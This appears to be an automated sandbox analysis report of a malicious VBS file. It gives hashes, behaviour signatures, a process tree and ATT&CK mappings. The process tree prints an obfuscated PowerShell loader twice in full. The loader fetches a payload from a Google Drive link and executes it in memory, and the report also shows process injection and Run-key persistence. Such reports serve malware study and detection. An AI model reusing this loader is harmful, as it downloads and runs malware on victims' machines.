78c839524d9027043b84f28cae2b5d3f376f6318d29732ebc553a4a6595eff00

Analysis

max time kernel
146s
max time network
120s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
07/06/2024, 01:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

78c839524d9027043b84f28cae2b5d3f376f6318d29732ebc553a4a6595eff00.vbs
Size

25KB
MD5

ecdc12be2020c1f7e5717bc672a55037
SHA1

f20edefa4b90096e9a6c3fa52c83a36f1d29c139
SHA256

78c839524d9027043b84f28cae2b5d3f376f6318d29732ebc553a4a6595eff00
SHA512

2478158edcdbdd9dab60fe942acc69465c8ecbf727cfc34180a3519380f40d789a9f0d726677014a313c074b9ef855028de7283da8dd7499e631355ba7bb8a76
SSDEEP

384:Gxk2uAnx4nmWDO2xOoNfSWuEBINfPDlrqhqW8J8fIKy+j6YwZ/FPT:Gq20xDpdNaaBKfPhCqWNRy+j6PXT

Score

8^/10

persistence

Malware Config

Signatures

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-3627615824-4061627003-3019543961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	wevtutil.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\INNLBJBPDVG = "C:\\Program Files (x86)\\windows mail\\wab.exe"	wevtutil.exe

Blocklisted process makes network request 6 IoCs

flow	pid	Process
2	2220	WScript.exe
5	2220	WScript.exe
10	2060	powershell.exe
12	2060	powershell.exe
13	2060	powershell.exe
15	2060	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
9	drive.google.com
10	drive.google.com
17	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2764	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2628	powershell.exe
2764	wab.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2628 set thread context of 2764	2628	powershell.exe	34
PID 2764 set thread context of 1336	2764	wab.exe	21
PID 2764 set thread context of 2024	2764	wab.exe	39
PID 2024 set thread context of 1336	2024	wevtutil.exe	21

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
2060	powershell.exe
2628	powershell.exe
2628	powershell.exe
2764	wab.exe
2764	wab.exe
2764	wab.exe
2764	wab.exe
2764	wab.exe
2764	wab.exe
2764	wab.exe
2764	wab.exe
2024	wevtutil.exe
2024	wevtutil.exe
2024	wevtutil.exe
2024	wevtutil.exe
2024	wevtutil.exe
2024	wevtutil.exe
2024	wevtutil.exe
2024	wevtutil.exe
2024	wevtutil.exe
2024	wevtutil.exe
2024	wevtutil.exe
2024	wevtutil.exe
2024	wevtutil.exe
2024	wevtutil.exe
2024	wevtutil.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
2628	powershell.exe
2764	wab.exe
1336	Explorer.EXE
1336	Explorer.EXE
2024	wevtutil.exe
2024	wevtutil.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2220 wrote to memory of 2060	2220	WScript.exe	28
PID 2220 wrote to memory of 2060	2220	WScript.exe	28
PID 2220 wrote to memory of 2060	2220	WScript.exe	28
PID 2060 wrote to memory of 3036	2060	powershell.exe	30
PID 2060 wrote to memory of 3036	2060	powershell.exe	30
PID 2060 wrote to memory of 3036	2060	powershell.exe	30
PID 2060 wrote to memory of 2628	2060	powershell.exe	32
PID 2060 wrote to memory of 2628	2060	powershell.exe	32
PID 2060 wrote to memory of 2628	2060	powershell.exe	32
PID 2060 wrote to memory of 2628	2060	powershell.exe	32
PID 2628 wrote to memory of 2588	2628	powershell.exe	33
PID 2628 wrote to memory of 2588	2628	powershell.exe	33
PID 2628 wrote to memory of 2588	2628	powershell.exe	33
PID 2628 wrote to memory of 2588	2628	powershell.exe	33
PID 2628 wrote to memory of 2764	2628	powershell.exe	34
PID 2628 wrote to memory of 2764	2628	powershell.exe	34
PID 2628 wrote to memory of 2764	2628	powershell.exe	34
PID 2628 wrote to memory of 2764	2628	powershell.exe	34
PID 2628 wrote to memory of 2764	2628	powershell.exe	34
PID 2628 wrote to memory of 2764	2628	powershell.exe	34
PID 1336 wrote to memory of 2024	1336	Explorer.EXE	39
PID 1336 wrote to memory of 2024	1336	Explorer.EXE	39
PID 1336 wrote to memory of 2024	1336	Explorer.EXE	39
PID 1336 wrote to memory of 2024	1336	Explorer.EXE	39

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1336
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\78c839524d9027043b84f28cae2b5d3f376f6318d29732ebc553a4a6595eff00.vbs"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:2220
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Khartoumer = 1;Function Unchemical24($Gamas){$Titulary=$Gamas.Length-$Khartoumer;$Larmede='Substring';For( $Ratebetalingen=7;$Ratebetalingen -lt $Titulary;$Ratebetalingen+=8){$Klavier+=$Gamas.$Larmede.Invoke( $Ratebetalingen, $Khartoumer);}$Klavier;}function Trophy($Srkermer){ . ($Psychopath) ($Srkermer);}$Toksikologiens=Unchemical24 'InsusceMPotoroioSanitiszGiggleri didaktlForretnlBior enarecirku/ Arners5Stadstj.Smaafe.0Baroque Vommere(hoofbouWAguard iLge ononBegoniad Torn so virksowSvededrsfrostru Amb,ettNMentagrTEtatsas Non ung1Luftfar0 D,cont.Sequ.nt0Harshne; Oparbe ImagescWStrtankiEtiquetnA,propn6Bortfrt4Liniens;Qu nces Rens rrxUntradi6phantas4Prgning;Philipp BegynderBunt ngvProgra : Fejlbe1 Gravid2Damerae1bl fisk. Spagfr0Sanglrk)Insuper LeahspoG TilbageMyricaccKofeminkz,nketsoRheinln/Genansk2,hirlin0Singale1Brod.re0 Vrd,st0 senesc1Aabenra0Stadsga1accoute DienersFDob elti BinrtdrKommande Term.nfGus,ingo ighedxAircoac/Fle,umt1Musikko2Ti sdag1Julenis.Histoge0Pemolin ';$Sunbaked=Unchemical24 'M,skinsUFirevresac.dizielatriair,omuncl- Pis,boA Aaens,gDodonaeemet.ylcnStttepitRektio, ';$Anlbshavnes=Unchemical24 'Tawn nehSammenstMaillnotHalv,beptiss mysSgnedag: hrdigd/Improve/ YdelsedMotionsr NoncadiPen lhuvSammenkeNegrene. Sel pegSkyldigo,pitafio Atticeg SupporlGearkaseS.gomra.Radiodoc ,ritido vergerm T pein/ Fibrocu RuglikcRhinoge? aistreeLar.eoux MatinepNatradioNe enforCateunntKusi en=Betnk.idRethresoRaimentwNongrapnMu dergl AbrikooCinemataKrys.aldExculpa& ,awtitiNo.therdSlettel=Euc lor1Anfrt,vWAfskyd,6BenglerQCoronatz.arosseTOrtho,rrSu.phon9 LigaraY SociocC Kiaug.W DepartYNeurode2MororfocSwaddisJBelbs.a3LaboriszNo defiBE.bryon3BudgetfrCyk llbcSholami0NonanalLTusi,deW ShellpJLogistiSswimmi,tAimoarhCAdfrdsr2Soedy.t9 GennemKUnslackn Negat.FResundk ';$Heelstrap=Unchemical24 'koncern>Antepen ';$Psychopath=Unchemical24 'Bizonesi SkraabeSkrnernxcogener ';$Innocuous='Hyperaesthete';$Gonion = Unchemical24 'Pteropoe DekollcGalpendh lymuseo Baggar Rektifi%Provacca ageskgpSubstanpFunktiod ,fgruna Compart Troc.ia Uncank%Interge\HypoploH SyntetaUrfje.dgScen,rpiInternaoa giopag Subforr Tvrskia R learpHeterogh Departifremfrec.oughtyaTamoyo.l Shield.InversiPBoobrierUrovarsoExoasca Svirens& Zi,khv&Herni,r Faderske Frin.mcKapsejlhDebili o ribade TransfotTranspl ';Trophy (Unchemical24 'Polypla$S.ciokogAntarallSn,glegoronsdorbPilkombaL unchclLrkesaf:ExultatGTu neseaBlankesn Fat gagJourneysreprovitIodotanoTilsagnl AstomoeKontakt= lucife(diobolscArbejdsmL delsed diktat Speedgu/Kartotecn nelec Pre nd$CreosotGD.bbelto Fedts,nChatteai Stensto Korpsen E,rfla)Ah,ngho ');Trophy (Unchemical24 'Censore$,mmendegInva inlUd kifto Corkeub aloeleaSultan.lHydroph: SnderlCGriefsey etatespPoolroorLed,toniFerielunFootbriiVentrildBunch,eaAkeno eeSkjoldb=Cheapsk$ LathhoATal filnFortjenlTankelsbGraderesgaa.dlihkbesummaHandlervCoscinonjetmaskeOrycto s Subjun.di.tonis Persp,p DisendlRenegotiforurentEndowe,(ubiq.ei$Quinal.HChalcope TinamoeSporvidlReciprosFortrint FinlanrTrigs gaAzo,ybepNonm ni)Klorofy ');$Anlbshavnes=$Cyprinidae[0];$Verballed46= (Unchemical24 'Industr$ berithgHorten.lDokstnioUdviklibCheesieaPetta,ll oroban:For mmeAFunkunsv OpticoaPrea.drnNg,ltrut Forhipg Lteresa Undemor HyperbdKystboeeEnds aksDejseca=RevoiciNFldekareDefeasawTan let-EpilepsOmuyanstbSteatopjEloxaleeRepti fcBemjel.tXenic.s Rem.demSUdv,dely KvartmsAut.vast,ucanereddsgangmakt,ons.ParametNRicinole SgsmaatCabriol.,huribuWA.roporeG.ovsorbFostrinCmi hridl JazzbaiForurenePar.norn Glevett');$Verballed46+=$Gangstole[1];Trophy ($Verballed46);Trophy (Unchemical24 'Isonitr$KolkozeA Pellucv UndersaCallalonaffaldstgentlepg YderliaMilieukrAl vantdNo indueAndenrasDualist.ForbarmHT,urifeePoetiseaUnvenomd VentureProm ntrHind.issD.acona[Oppebrs$Calus pSAjari.ku.igeonan,errarybLydskriaColicsfk ServedeLathe.adBdlsi.d]proteac=Egalise$miljt.kT,urreyvosmilingkPr jetrsBrug.kui digstek ,mmonioSylfernlElectroo t ricfgSelvskyiModificeJer.tilnSnrestvsVerdanc ');$Lazily181=Unchemical24 'Tigerfi$ Wooed AInerrabvTe.punbaIberegnnIndelukt otorbog BichoraWhosenbrTeleinfd OutwineHuldests Gadget. Pick,tDTovvrkkobr ntbowke,gedsnLselystl EchoisoUnhydroaPerculsdPenneprF.kiftnii AftnedlDolomiteOvervae(Eylifsm$ ProfesASubterrnKodificl Bedehob EkspedsRadium.h wi,haaa erotypvG.umaltnCh.lineeGuldfissAnke,to,Tresaar$Drugg.tG,onorovaFilterhlVoksenavVende.aaSorthavnFing rsiDisorgaspeder,seR.jseomrFaresoeeKirkemi)Ombyt l ';$Galvanisere=$Gangstole[0];Trophy (Unchemical24 ' Konfir$TmrermegByro,ialNitrogeoMunkeorbDaare,ia CayennlHarmeli:Re,nestdSl nderaNondi,tnInhabi dTraktatiBnnemdesD,senno=Shining(UnanthoT.rivatke Todadys StickstInducem-HalvaarPanker.dahalf,aytstearinh Usdeli antiant$UnenquiGPisc toaHandwallSangsnevRes dena Desarmn HodgkiiInge,jrs.yphloeeHovedklrSprjteneG.mecoc)Teug,an ');while (!$dandis) {Trophy (Unchemical24 ' Fo,vik$talcerhgDi.ressllettankoJeopa,db Swiftia omstillK.ndeli:sti.linA kyrillp HoneybpLnmodtarRailroaaPr,jetsiradial.sHydroseaUnderoxbGadlinglWali,lleLeep ro=Amphora$Reexpret,elejrirPr,accouFo.sdene Buccog ') ;Trophy $Lazily181;Trophy (Unchemical24 'LagomorSSavourit Ver fiaOccipitr UoplystRegerin-BindismS Trierpl.amiergeShruffceRefringp Stifte ant ra4Vildkat ');Trophy (Unchemical24 'Densite$Hanso,dgForderblSingaleoGuldaldbOverskuaLignonelPostkod: isordedSe,weedaOversimn,onvoyidLsepultiRetusess Lea,ue=Chronol( FljdrsTSqu,bmoeKapunersfr.aktit,orsoeg-.redjevPUforudsa Hall.atControlhPlagiar Arina,e$RecedejGExpectoaBarrensl .ndomivTopopolaLifeboan LactesiC,lemousIndlseneReoxidirNo,appeeVa lakk)P.ssibi ') ;Trophy (Unchemical24 ' St ern$Haa.dsogpin erllDustineoRigstrnbSkriveba Isthcylpath.ti:FirblokmSig.alkouopmrkstKdkrogeoKalkmalrBonbonewHalvtanaDegeneryNo,topos U,decr=Kd.ende$AnlgsudgStanlysl.selvstoFormeribNaturfnaE enartlMana.in:,ncurabRUnpensieMisaddssDuns eneHippolorAmtsv.nv.limatoe Gnos.orPrst,gliLan.somnStrychngUdhus.tsEpeelognCh.rdinuT.okratm MetallrOrganiseLutihawtVa dfas+ Bldvar+ Stamfo% S,rogb$ KreperCSemih.dyIrreprop .hermorFa,dskri Slib insljfedeiStrygekdFagklasa Peripremonochl. IngivicEp tonioSyleskau ellernSporu,itOve.vur ') ;$Anlbshavnes=$Cyprinidae[$motorways];}$Underwaists=305117;$Hulskeers=30631;Trophy (Unchemical24 'Drmmeri$LoftsmagPerserelBankbokoOutsa.obSpumifoa Dega.sl,anktio:EnharmoSDej,rogtNeurosurRommackmOrb culuSkimmitdVarmebef.osthusaUnderp lVognpardIns stie HandeltDruerspsDr ffbo Barokk=Au oant RelatiG skiddieSejlgartAnden,r-SkadesfCdogboatoVoldskunMe tloat ReanimeU,ochornDoktorrtKollodi D nsito$KarikatGPaickcoaHyperbol SupercvHresvagaGormanln FortviiudlsninsDr,armeeUndistir Abdiceebrdfden ');Trophy (Unchemical24 'Bl dede$ Alo,icg UskyldlNonproto.nsvarsbsikringa ColumblInitial:Fla mulDUna ortdSulfolyssnvlendnDozerens CorymbkExte tiebenm,derUndoweln siphone FilafasM.stodo Suppete=Medlemm Inhesio[ SmillsS.arantay,egionssfornyertArabeskeS.englem S.rpen.SeraferC ForlysoM.strinn Fulg.rv Hoved eTolu.dirEksek,ttSkjalde] Nogaim:Isother:FarvebiFM rgenbr Underfo SenestmIndkbsaBIcosit.abardisks SerpuleBordbom6 Perdu 4JokeletSSphaerotunindifrMarmarciMyo ibrnOverpleg Pil,ti(Lrlinge$,arkosaS EmnetstMin ster FissiomToivoanu fuksrddKlokkerfSpalteta causatlCongenid.ntrereeUngrasptManropesOpkrvet)Skidlid ');Trophy (Unchemical24 'Tranche$Bosh,argToryismlFlagskio .eracib Stadsga RepubllKlembsn:FastekuS ermaniuFornuftbParaffisevolutipSnobdome For ldc.rdinariSluicinfSrbehani AfdkkecPlummetaDriftsclflushedlAudiofoyIllhumo Emberiz=Dekrete Farvemo[ FornrmSValkeleyAnneksss Affe ttA.drogyeStemmesmunhumi,. NsvispTFodboldeunsatiaxEvighedtGagernu.Cl.usinEHejdukrnLkasserc R astooRerrigcdOver.ooiWannestnPoly.ongF,xesor]Skolesk:Gynecol:HephaesAP,vonatSForel,kCPoris.sI Me recIafsnits.GlowersGdrab.lieEffectutRi seneSFussbudt UmbilirMandibuiDrmmecenImmaturgTe.reti(Sn.live$ EncephD LectiodRunderesSedl,rnn.traalisAfviklek JanthieSt,anglrTreaguen FainaieZarzuelsDissent)ev,ngel ');Trophy (Unchemical24 'Promi,i$Stratosg SymposlMuti.enoBrnearbbUb.slutaGlintinluni.ide:ForulykJForbruguNebulaslLoessoieGengavbb Kiti,suUtilfrekWickyg.kbageblaeD chlornOverstae BikinisProtoch=lifegua$ omposiSSamkrsluNo mmosbTakkelasGenfindpTragasoeRypejugcInteresiCramoisf DefensiCoraslucPeripataBacterilharebotlProjectyUrceola. UnionismellemsuGlaserib I.issusSo sorttKar.oter K.ehugi ppressnStaturegMoseko,(Tegnflg$Juveni U Postc nContakidHype,ameM.rmelarSkrdd rwUrethroaRocksliiF shbolsKolonn t musikasUnitare, bluffe$Pan,gyrHKonservuSalvoedlFar ieasmassierkDirektoeFerieb e Omst erStaldb sKo gula)V skeri ');Trophy $Julebukkenes;"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2060
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hagiographical.Pro && echo t"
      4⤵
      PID:3036
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Khartoumer = 1;Function Unchemical24($Gamas){$Titulary=$Gamas.Length-$Khartoumer;$Larmede='Substring';For( $Ratebetalingen=7;$Ratebetalingen -lt $Titulary;$Ratebetalingen+=8){$Klavier+=$Gamas.$Larmede.Invoke( $Ratebetalingen, $Khartoumer);}$Klavier;}function Trophy($Srkermer){ . ($Psychopath) ($Srkermer);}$Toksikologiens=Unchemical24 'InsusceMPotoroioSanitiszGiggleri didaktlForretnlBior enarecirku/ Arners5Stadstj.Smaafe.0Baroque Vommere(hoofbouWAguard iLge ononBegoniad Torn so virksowSvededrsfrostru Amb,ettNMentagrTEtatsas Non ung1Luftfar0 D,cont.Sequ.nt0Harshne; Oparbe ImagescWStrtankiEtiquetnA,propn6Bortfrt4Liniens;Qu nces Rens rrxUntradi6phantas4Prgning;Philipp BegynderBunt ngvProgra : Fejlbe1 Gravid2Damerae1bl fisk. Spagfr0Sanglrk)Insuper LeahspoG TilbageMyricaccKofeminkz,nketsoRheinln/Genansk2,hirlin0Singale1Brod.re0 Vrd,st0 senesc1Aabenra0Stadsga1accoute DienersFDob elti BinrtdrKommande Term.nfGus,ingo ighedxAircoac/Fle,umt1Musikko2Ti sdag1Julenis.Histoge0Pemolin ';$Sunbaked=Unchemical24 'M,skinsUFirevresac.dizielatriair,omuncl- Pis,boA Aaens,gDodonaeemet.ylcnStttepitRektio, ';$Anlbshavnes=Unchemical24 'Tawn nehSammenstMaillnotHalv,beptiss mysSgnedag: hrdigd/Improve/ YdelsedMotionsr NoncadiPen lhuvSammenkeNegrene. Sel pegSkyldigo,pitafio Atticeg SupporlGearkaseS.gomra.Radiodoc ,ritido vergerm T pein/ Fibrocu RuglikcRhinoge? aistreeLar.eoux MatinepNatradioNe enforCateunntKusi en=Betnk.idRethresoRaimentwNongrapnMu dergl AbrikooCinemataKrys.aldExculpa& ,awtitiNo.therdSlettel=Euc lor1Anfrt,vWAfskyd,6BenglerQCoronatz.arosseTOrtho,rrSu.phon9 LigaraY SociocC Kiaug.W DepartYNeurode2MororfocSwaddisJBelbs.a3LaboriszNo defiBE.bryon3BudgetfrCyk llbcSholami0NonanalLTusi,deW ShellpJLogistiSswimmi,tAimoarhCAdfrdsr2Soedy.t9 GennemKUnslackn Negat.FResundk ';$Heelstrap=Unchemical24 'koncern>Antepen ';$Psychopath=Unchemical24 'Bizonesi SkraabeSkrnernxcogener ';$Innocuous='Hyperaesthete';$Gonion = Unchemical24 'Pteropoe DekollcGalpendh lymuseo Baggar Rektifi%Provacca ageskgpSubstanpFunktiod ,fgruna Compart Troc.ia Uncank%Interge\HypoploH SyntetaUrfje.dgScen,rpiInternaoa giopag Subforr Tvrskia R learpHeterogh Departifremfrec.oughtyaTamoyo.l Shield.InversiPBoobrierUrovarsoExoasca Svirens& Zi,khv&Herni,r Faderske Frin.mcKapsejlhDebili o ribade TransfotTranspl ';Trophy (Unchemical24 'Polypla$S.ciokogAntarallSn,glegoronsdorbPilkombaL unchclLrkesaf:ExultatGTu neseaBlankesn Fat gagJourneysreprovitIodotanoTilsagnl AstomoeKontakt= lucife(diobolscArbejdsmL delsed diktat Speedgu/Kartotecn nelec Pre nd$CreosotGD.bbelto Fedts,nChatteai Stensto Korpsen E,rfla)Ah,ngho ');Trophy (Unchemical24 'Censore$,mmendegInva inlUd kifto Corkeub aloeleaSultan.lHydroph: SnderlCGriefsey etatespPoolroorLed,toniFerielunFootbriiVentrildBunch,eaAkeno eeSkjoldb=Cheapsk$ LathhoATal filnFortjenlTankelsbGraderesgaa.dlihkbesummaHandlervCoscinonjetmaskeOrycto s Subjun.di.tonis Persp,p DisendlRenegotiforurentEndowe,(ubiq.ei$Quinal.HChalcope TinamoeSporvidlReciprosFortrint FinlanrTrigs gaAzo,ybepNonm ni)Klorofy ');$Anlbshavnes=$Cyprinidae[0];$Verballed46= (Unchemical24 'Industr$ berithgHorten.lDokstnioUdviklibCheesieaPetta,ll oroban:For mmeAFunkunsv OpticoaPrea.drnNg,ltrut Forhipg Lteresa Undemor HyperbdKystboeeEnds aksDejseca=RevoiciNFldekareDefeasawTan let-EpilepsOmuyanstbSteatopjEloxaleeRepti fcBemjel.tXenic.s Rem.demSUdv,dely KvartmsAut.vast,ucanereddsgangmakt,ons.ParametNRicinole SgsmaatCabriol.,huribuWA.roporeG.ovsorbFostrinCmi hridl JazzbaiForurenePar.norn Glevett');$Verballed46+=$Gangstole[1];Trophy ($Verballed46);Trophy (Unchemical24 'Isonitr$KolkozeA Pellucv UndersaCallalonaffaldstgentlepg YderliaMilieukrAl vantdNo indueAndenrasDualist.ForbarmHT,urifeePoetiseaUnvenomd VentureProm ntrHind.issD.acona[Oppebrs$Calus pSAjari.ku.igeonan,errarybLydskriaColicsfk ServedeLathe.adBdlsi.d]proteac=Egalise$miljt.kT,urreyvosmilingkPr jetrsBrug.kui digstek ,mmonioSylfernlElectroo t ricfgSelvskyiModificeJer.tilnSnrestvsVerdanc ');$Lazily181=Unchemical24 'Tigerfi$ Wooed AInerrabvTe.punbaIberegnnIndelukt otorbog BichoraWhosenbrTeleinfd OutwineHuldests Gadget. Pick,tDTovvrkkobr ntbowke,gedsnLselystl EchoisoUnhydroaPerculsdPenneprF.kiftnii AftnedlDolomiteOvervae(Eylifsm$ ProfesASubterrnKodificl Bedehob EkspedsRadium.h wi,haaa erotypvG.umaltnCh.lineeGuldfissAnke,to,Tresaar$Drugg.tG,onorovaFilterhlVoksenavVende.aaSorthavnFing rsiDisorgaspeder,seR.jseomrFaresoeeKirkemi)Ombyt l ';$Galvanisere=$Gangstole[0];Trophy (Unchemical24 ' Konfir$TmrermegByro,ialNitrogeoMunkeorbDaare,ia CayennlHarmeli:Re,nestdSl nderaNondi,tnInhabi dTraktatiBnnemdesD,senno=Shining(UnanthoT.rivatke Todadys StickstInducem-HalvaarPanker.dahalf,aytstearinh Usdeli antiant$UnenquiGPisc toaHandwallSangsnevRes dena Desarmn HodgkiiInge,jrs.yphloeeHovedklrSprjteneG.mecoc)Teug,an ');while (!$dandis) {Trophy (Unchemical24 ' Fo,vik$talcerhgDi.ressllettankoJeopa,db Swiftia omstillK.ndeli:sti.linA kyrillp HoneybpLnmodtarRailroaaPr,jetsiradial.sHydroseaUnderoxbGadlinglWali,lleLeep ro=Amphora$Reexpret,elejrirPr,accouFo.sdene Buccog ') ;Trophy $Lazily181;Trophy (Unchemical24 'LagomorSSavourit Ver fiaOccipitr UoplystRegerin-BindismS Trierpl.amiergeShruffceRefringp Stifte ant ra4Vildkat ');Trophy (Unchemical24 'Densite$Hanso,dgForderblSingaleoGuldaldbOverskuaLignonelPostkod: isordedSe,weedaOversimn,onvoyidLsepultiRetusess Lea,ue=Chronol( FljdrsTSqu,bmoeKapunersfr.aktit,orsoeg-.redjevPUforudsa Hall.atControlhPlagiar Arina,e$RecedejGExpectoaBarrensl .ndomivTopopolaLifeboan LactesiC,lemousIndlseneReoxidirNo,appeeVa lakk)P.ssibi ') ;Trophy (Unchemical24 ' St ern$Haa.dsogpin erllDustineoRigstrnbSkriveba Isthcylpath.ti:FirblokmSig.alkouopmrkstKdkrogeoKalkmalrBonbonewHalvtanaDegeneryNo,topos U,decr=Kd.ende$AnlgsudgStanlysl.selvstoFormeribNaturfnaE enartlMana.in:,ncurabRUnpensieMisaddssDuns eneHippolorAmtsv.nv.limatoe Gnos.orPrst,gliLan.somnStrychngUdhus.tsEpeelognCh.rdinuT.okratm MetallrOrganiseLutihawtVa dfas+ Bldvar+ Stamfo% S,rogb$ KreperCSemih.dyIrreprop .hermorFa,dskri Slib insljfedeiStrygekdFagklasa Peripremonochl. IngivicEp tonioSyleskau ellernSporu,itOve.vur ') ;$Anlbshavnes=$Cyprinidae[$motorways];}$Underwaists=305117;$Hulskeers=30631;Trophy (Unchemical24 'Drmmeri$LoftsmagPerserelBankbokoOutsa.obSpumifoa Dega.sl,anktio:EnharmoSDej,rogtNeurosurRommackmOrb culuSkimmitdVarmebef.osthusaUnderp lVognpardIns stie HandeltDruerspsDr ffbo Barokk=Au oant RelatiG skiddieSejlgartAnden,r-SkadesfCdogboatoVoldskunMe tloat ReanimeU,ochornDoktorrtKollodi D nsito$KarikatGPaickcoaHyperbol SupercvHresvagaGormanln FortviiudlsninsDr,armeeUndistir Abdiceebrdfden ');Trophy (Unchemical24 'Bl dede$ Alo,icg UskyldlNonproto.nsvarsbsikringa ColumblInitial:Fla mulDUna ortdSulfolyssnvlendnDozerens CorymbkExte tiebenm,derUndoweln siphone FilafasM.stodo Suppete=Medlemm Inhesio[ SmillsS.arantay,egionssfornyertArabeskeS.englem S.rpen.SeraferC ForlysoM.strinn Fulg.rv Hoved eTolu.dirEksek,ttSkjalde] Nogaim:Isother:FarvebiFM rgenbr Underfo SenestmIndkbsaBIcosit.abardisks SerpuleBordbom6 Perdu 4JokeletSSphaerotunindifrMarmarciMyo ibrnOverpleg Pil,ti(Lrlinge$,arkosaS EmnetstMin ster FissiomToivoanu fuksrddKlokkerfSpalteta causatlCongenid.ntrereeUngrasptManropesOpkrvet)Skidlid ');Trophy (Unchemical24 'Tranche$Bosh,argToryismlFlagskio .eracib Stadsga RepubllKlembsn:FastekuS ermaniuFornuftbParaffisevolutipSnobdome For ldc.rdinariSluicinfSrbehani AfdkkecPlummetaDriftsclflushedlAudiofoyIllhumo Emberiz=Dekrete Farvemo[ FornrmSValkeleyAnneksss Affe ttA.drogyeStemmesmunhumi,. NsvispTFodboldeunsatiaxEvighedtGagernu.Cl.usinEHejdukrnLkasserc R astooRerrigcdOver.ooiWannestnPoly.ongF,xesor]Skolesk:Gynecol:HephaesAP,vonatSForel,kCPoris.sI Me recIafsnits.GlowersGdrab.lieEffectutRi seneSFussbudt UmbilirMandibuiDrmmecenImmaturgTe.reti(Sn.live$ EncephD LectiodRunderesSedl,rnn.traalisAfviklek JanthieSt,anglrTreaguen FainaieZarzuelsDissent)ev,ngel ');Trophy (Unchemical24 'Promi,i$Stratosg SymposlMuti.enoBrnearbbUb.slutaGlintinluni.ide:ForulykJForbruguNebulaslLoessoieGengavbb Kiti,suUtilfrekWickyg.kbageblaeD chlornOverstae BikinisProtoch=lifegua$ omposiSSamkrsluNo mmosbTakkelasGenfindpTragasoeRypejugcInteresiCramoisf DefensiCoraslucPeripataBacterilharebotlProjectyUrceola. UnionismellemsuGlaserib I.issusSo sorttKar.oter K.ehugi ppressnStaturegMoseko,(Tegnflg$Juveni U Postc nContakidHype,ameM.rmelarSkrdd rwUrethroaRocksliiF shbolsKolonn t musikasUnitare, bluffe$Pan,gyrHKonservuSalvoedlFar ieasmassierkDirektoeFerieb e Omst erStaldb sKo gula)V skeri ');Trophy $Julebukkenes;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2628
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hagiographical.Pro && echo t"
        5⤵
        
        PID:2588
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2764
- C:\Windows\SysWOW64\wevtutil.exe
  "C:\Windows\SysWOW64\wevtutil.exe"
  2⤵
  - Adds policy Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:2024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
